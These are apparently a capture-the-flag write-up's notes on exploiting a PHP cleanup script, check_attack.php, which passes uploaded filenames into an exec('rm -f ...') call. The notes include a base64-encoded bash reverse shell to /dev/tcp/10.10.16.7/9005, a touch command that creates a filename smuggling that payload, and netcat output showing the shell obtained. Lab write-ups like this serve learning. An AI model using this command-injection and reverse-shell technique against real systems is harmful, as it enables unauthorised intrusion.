5 check_attack.php
# file: lib.php
getnameCheck($value) | 10_10_16_7.php.png
=> same as before LITERALLY.
pieces = array(split on '.') | Array ( [0] => 10_10_16_7 [1] => php [2] => png )
name = pieces[0] | 10_10_16_7
name = replace '_' with '.' | 10.10.16.7
ext = join pieces with '.' after the removed 1st element | php.png
return name, ext
check_ip($name, $ext) | name=IP, ext=filename
check if name is an IP using FILTER_VALIDATE_IP
msg = filename
return true, msg
else =>
return false, attack on file <file>: not valid IP
loads all files in /var/www/html/uploads/
if file = 'index.html' => do nothing
getnameCheck() | returns name=IP, ext=extension
check = check_ip | returns true,filename
if check[0] is false,
create /tmp/attack.log with file contents
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
send mail $to $subject $msg $headers
# we control the paramater value (the filename) in file
# tried running this file on locally and any new file created
# the IP gets broken as filename is split on the first '.'
# base64
$ echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.7/9005 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi
$ touch -- ';echo YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi|base64 -d | bash'
$ nc -lvnp 9005
listening on [any] 9005 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.146] 34270
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
whoami
guly
Last updated